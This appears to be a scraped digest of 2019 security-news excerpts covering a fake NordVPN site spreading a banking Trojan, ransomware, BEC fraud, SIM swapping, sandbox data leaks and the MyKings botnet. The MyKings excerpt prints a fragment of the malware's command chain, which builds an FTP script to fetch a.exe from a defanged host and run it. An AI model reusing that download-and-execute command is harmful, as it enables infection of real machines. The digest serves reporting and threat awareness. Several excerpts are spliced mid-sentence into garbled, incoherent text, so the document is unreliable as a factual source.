  • Hackers Use Fake NordVPN Website to Deliver Banking Trojan
    While previously they hacked legitimate websites to hijack download links infected with malware, the hackers are now creating website clones to deliver banking Trojans onto unsuspecting victims' computers. "Using this malware, hackers can perform web injections, traffic intercepts, keylogging and steal information from different bank-client systems." The operators behind this malicious campaign launched their attacks on August 8; they are focusing on English-speaking targets and, according to the researchers, thousands have already visited the nord-vpn[. However, he can make exceptions if the victim is valuable," Doctor Web malware analyst Ivan Korolev told BleepingComputer. He also said that the hackers are using the malware "mainly as keylogger/traffic sniffer/backdoor" after successfully infecting their victims.
  • Held hostage by ransomware? Here's how to respond
    No sector or organization is immune to ransomware - malicious software that holds data files hostage while hackers demand payment to restore access. Business systems owners have to decide between paying the ransom or recovering their systems on their own - and under time pressure, businesses are often tempted to pay the ransom. Last year a hospital in Indiana paid its ransom after realizing that while recovery was feasible, the costs, amount of effort, downtime and reputational damage involved in doing so would be too high. This year, following a ransomware attack, the US city of Baltimore estimated its recovery costs at more than $18 million - a much higher price than the $75,000 ransom, which the city opted to pay. Ensure that the organization’s cyber insurance covers ransomware attacks, and inform the insurance company as soon as an attack occurs.
  • $11M Email Scam at Caterpillar Sales Office Pinned to Nigerian Man
    "Logs indicate that between April 6 and April 20, 2018, the intruder accessed the CFO's account at least 464 times, mostly from Internet Protocol (IP) addresses in Nigeria," reads the affidavit from an FBI agent. With this level of access, it is stated that Okeke used the CFO's account to send fraudulent wire transfer requests to members of the company's internal financial team. Some emails had fake invoices with Unatrac logos, while others had been sent to the CFO's account from an external email (pakfei.trade@gmail.com) and then forwarded to employees in charge of making payments, to create the appearance of a legitimate trail. The FBI linked Okeke to this fraudulent activity starting from the email address 'iconoclastlast1960@gmail.com,' which received files from Unatrac's CFO OneDrive storage account. The breakthrough came from an FBI confidential source that linked 'iconoclastlast1960@gmail.com' malicious purposes.
  • Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response
    Unlike infections that start with embedded URLs and files, MyKings is tied together by scripts that simply download everything it needs from remote servers. ]info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe”} Mysa1 rundll32.exe c:\\windows\\debug\\item.dat Mysa2 cmd /c echo open ftp[.]ftp0118[. The injected user-land code’s main role is to download a piece of code from its C&C server, whose address is obtained from hxxp[://]www[.]upme0611[.]info/address[.]txt. After connection with the C&C server is established, TestMsg.tmp, a shellcode executed by the injected process, is downloaded from one of the servers above. The summarized list of HTTP requests that the malware variant performed to obtain C&C server addresses and download other payloads is shown in the full report. It then downloads kill.txt, a list of processes to be terminated, before it finally obtains the list of files to download and execute from downs.txt.
  • UK hacker-for-hire jailed for role in SIM-swapping attacks, data theft
    A British teenager has been sentenced to 20 months in prison after offering hacker-for-hire services to cash in on trends including SIM-swapping attacks. In April 2018, a routine visit was conducted to Gunton's home with respect to the Sexual Harm Prevention Order that was imposed in 2016 for past offenses. During the inspection, law enforcement found software which indicated the teenager may be involved in cybercrime, and the further investigation of a laptop belonging to Gunton and seized by police revealed that he had been offering himself as a provider of hacking services. This information, which could include personally identifiable information (PII) such as names, addresses, and online account details, could then be used to commit fraud and SIM-swapping attacks. It might only be a short window in which the victim does not realize their number has been transferred, but this time frame can be enough for an attacker to bypass two-factor authentication (2FA), intercept calls and text messages, request password resets, and compromise online accounts ranging from email addresses to cryptocurrency wallets.
  • Organizations Expose Sensitive Data via Malware Analysis Sandboxes
    Researchers at UK-based threat intelligence firm Cyjax have studied files submitted to three popular online malware analysis sandboxes and found that many of the publicly accessible files contain sensitive information. The analysis was carried out over a period of three days last week and it covered three unnamed sandbox services that allow users to upload files to determine whether they are malicious or benign. Cyjax’s analysis focused on PDF documents and email files (.msg and .eml). The experts have also analyzed a URL scanning service over the 3-day period and found that many of the submitted URLs pointed to sensitive data hosted on services such as Google Drive and the file sharing service WeTransfer. “Many providers require payment to submit files privately, meaning that everyone who uses the free service will have their files shared by default,” Cyjax explained.
  • Ransomware Gains Traction, UK BEC Fraud Spikes
    The latest news centers on Sodinokibi, a ransomware strain that has helped fraudsters make higher ransom demands. In the United Kingdom, as reported by govtinfosecurity.com, the UK Finance Department announced that the UK’s Dedicated Card and Payment Crime Unit, a specialized police unit backed by financial institutions, has dismantled 13 organized crime groups through the first half of the year, a rate that more than doubles that which was seen in the previous year. As reported by the site, 39 fraudsters were convicted after investigations by the DCPCU, and they were sentenced to a combined total of more than 44 years of prison time. Fraud prevented by the unit amounted to as much as $8.2 million in the first half of the year. Over the past 17 years, the unit has “disrupted” $732 million of fraud. According to the announcement detailing the indictment, Sponaugle allegedly used funds from the business’s bank account to pay corporate credit card bills associated with those personal purchases and hid her fraud by making false entries in the business’s financial accounting system.
  • Software Vulnerability Disclosure Is a Real Mess
    The researchers filed the report with the Mitre Corp., a US government–funded research organization that tracks common vulnerabilities and exposures (CVEs). About the "security issue" on #VLC: VLC is not vulnerable. And in the case of the VLC vulnerability, most reporters published their stories without contacting the developers. "In the VLC security issue, the researcher asked [Mitre] for a CVE and got it at the number 9.8," he says, pointing out that the last Linux kernel vulnerability that allowed attackers to compromise the system just by sending a packet to a Linux server in the cloud did not get a 9.8 score. In the case of the VLC vulnerability report, the researchers conducted their experiments with an outdated version of the vulnerable library. "I would point out that Mitre didn't create this vulnerability report; the researcher did."
  • IT threat evolution Q2 2019. Statistics
    * Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.
    * Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
    ** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.
    [Figure: Number of unique users attacked by financial malware, Q2 2019]
    Attack geography: To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.
    [Figure: Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019]
    Top 10 countries attacked by ransomware Trojans
    ** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.
  • Researchers discover flaws in software-based Router Network Isolation
    The study found multiple flaws in routers from TP-Link, D-Link, Edimax, and Belkin. The current technique discovered by the researchers allows for transfer of small amounts of data only.